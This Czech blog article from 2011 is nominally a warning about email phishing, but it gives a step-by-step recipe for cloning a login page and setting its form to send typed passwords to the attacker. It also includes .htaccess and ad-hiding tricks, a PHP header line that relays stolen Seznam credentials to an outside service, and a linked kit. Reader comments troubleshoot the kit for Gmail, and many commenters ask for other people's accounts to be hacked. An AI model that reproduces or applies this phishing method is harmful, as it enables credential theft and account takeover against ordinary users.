Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?
Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...

Aktualizováno 11.12.2011
"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein
Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!
Hesla typu "Q.q!SaW_2" jsou zbytečná!
- stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
- šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
- základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
- šikovnost a využití vaší hlouposti
Co útočníkovi stačí:
Jak bude postupovat:
- jde na přihlašovací stránku a stáhne ji podobně jako na obrázku
- vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
- otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek
- nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
- přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
- nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
- takový odkaz pak může poslat pomocí fake maileru nebo icq
Pár tipů
Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.
ErrorDocument 404 /login.html
Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:
<div style="display: none;"><!--reklama--></div>
Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:
header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);
Jak se bránit? Stačí dodržovat tyto zásady:
- neklikejte na odkazy příchozí z neznámých adres a čísel
- neklikejte na odkazy které mají podivnou url
- zbystřete jestliže po vás odkaz vyžaduje heslo
- čtěte url a uvažujte
- pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)
Odkazy
Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): zde
Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!
|
Autor: Vydáno: 11.12.2011 11:22 Přečteno: 40012x |
3D piškvorky Vánoce se blíží - tipy na dárky přibývají Sociotechnika - můžete mi pomoci? Neznám heslo... Jak přidat hudbu na profil lide.cz? |

Komentáře
Ale když na tom tak uvažuju tak se to týká nejen e-mailů
Myslím že je skvělé že tento web existuje
Doufám že si všichni čtenáři vezmou příklad a uvědomují si všechny následky
.Já jsem se ponaučil a proto děkuji Adminovy 
JJ prolomil jsem to.A to že celkově.Jak graficky tak i zbytek.Než sem pročetl soom tak sem to celkem nepobral
.Pokud odkaz pošlu přímo na e-mail tak mi příjde e-mail o hrozbě.Ale pokud je odkaz z jiného serveru tak mi nepříjde nic!!Netušíš jak to?? Zkoušim z 2 ip.adres.
Tak jediný k čemu sem se dostal je ("@ ---")
.Vše jsem zkoušel na 2 svých e-mailech.Doufám že Admin neudělal nějakej podfuk a moje hesla nelítaj někde po netu ?
každopádně jsou projistotku změněný 
Ahoj, pokud se ti zapisuje do logu jen @ --- tak si php script nevzal proměnné. Napiš si jednoduchý php scriptík pro zápis do souboru a proměnné odchytávej $_GET['NEZEV'] nebo postem, podle toho jak je z fake odesíláš - stačí k tomu opravdu minimální znalosti php :)
Tak vyzkoušel jsem co zde Admin tohoto webu radí.
Nejspíše to funguje ale heslo ani přihlašovací jméno sem nenašel
.Upozornění pro všechny!Kontrolujte opravdu adresu stránky kde se přihlašujete!!! 
Halo pomoc!!!! Vubec to nechapu a nejak mi to nejde prosim, poradte jak to udelat?
Prosím,potrebuji pomoc! S heslem k e-mailu na zoznam.sk,moc to nechapu.
,chtela sem to zkusit...
dííky :)) !
Dobrý den, potřebuji zjistit heslo k účtu na FB případně na mail. Finanční odměna jistá. Pokud se najde někdo schopný kontaktujte mě na: milan.kavar@seznam.cz
Prosíím moc o púomoc, o hacknuti e-mailu: putyus@zoznam.sk
!! BUdu vdecna,prosim na e-mail kktm@seznam.cz
Kdo hackne Moc díky !!
A KED to niekdo viete tak mi to heknite prosim volam sa Dominik Dimitrov a piste na kolombo112@azet.sk
prosim hacknes mi moj profil na fb lebo som zabudol heslo a niekdo mi tam chodi email na ktori to posli je kolombo112@azet.sk pekne dakujem
cau prosim o pomoc zjisteni hesla u meho emailu matejka1k@seznam.cz a mysterak@seznam.cz.. hesla zaslete na email ovocitma@seznam.cz
predem dekuji :) je to dulezite :)
Ještě něco potřebuješ? :-) Nejsme tu helpdesk - článek je ukázka nebezpečí...
cest lidi prosim potrebuju zjistit jedno heslo na jeden email ten kdo se umi dostat na cizi meil prosim piste na muj email kubez@seznam.cz a domluvime se co a jak kdo to udela bude borec a neco mu za to dam je to fakt dulezite dik moc
cau prosim o pomoc zjisteni hesla u meho stareho mailu kdo by dokazal pomoct at napise na lukass.maly@seznam.cz
Zdravím, nevím jestli vám na tyto dotazy někdo reaguje (já ne), ale zjištěním cizích hesel a přihlášením se do schránky se porušuje listovní tajemství atd. atd... Tak to berte navědomí :) Díky
Může mi někdo pomoct se zjištěním hesla na mail na Seznamu? Odpovědi prosím na Carlis2b6@seznam.cz. Dík
prosím,fakt moc prosím.umí někdo zjistit heslo na email atlas?
můj email,tonda1@atlas.cz
jen diskétně!odměna!
prosim zisti my nekdo heslo na email filipcacko@gmail.com
Mám problém, při zadání emailu a hesla mi to vypíše chybovou hlášku, že nejde otevřít Log.txt ani do něj zapsat apod.. Co stím?
Nastavit adresáři a souborům práva 777
Tak už to fičí i na gmailu. Problém bol ako si písal v tom názve premennej.
Ahoj prosimte nemohl bys mi zjistit jedno heslo ns seznam .díky
Haluz, na Seznamu to funguje krasne ale na gmailu to piše furt : @ ---
skúšal som aj $_GET['password'] alebo $_POST['password'] v logu
A odchytáváš správný název proměnné? :) Koukal jsem na to a gmail posílá údaje jako: Passwd a Email